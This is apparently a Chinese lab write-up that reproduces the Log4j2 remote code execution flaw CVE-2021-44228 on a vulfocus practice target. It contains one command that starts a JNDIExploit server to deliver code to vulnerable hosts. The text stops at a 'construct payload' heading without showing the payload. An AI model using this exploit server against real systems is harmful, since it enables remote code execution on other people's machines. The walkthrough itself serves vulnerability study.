Log4j2远程命令执行(CVE-2021-44228)
前言
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
一、vulfocus靶场
二、复现步骤
1.靶场如下
2.点击抓包
启动
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 35532 -i 0.0.0.0
构造payload
URL编码:https://tool.chinaz.com/tools/urlencode.aspx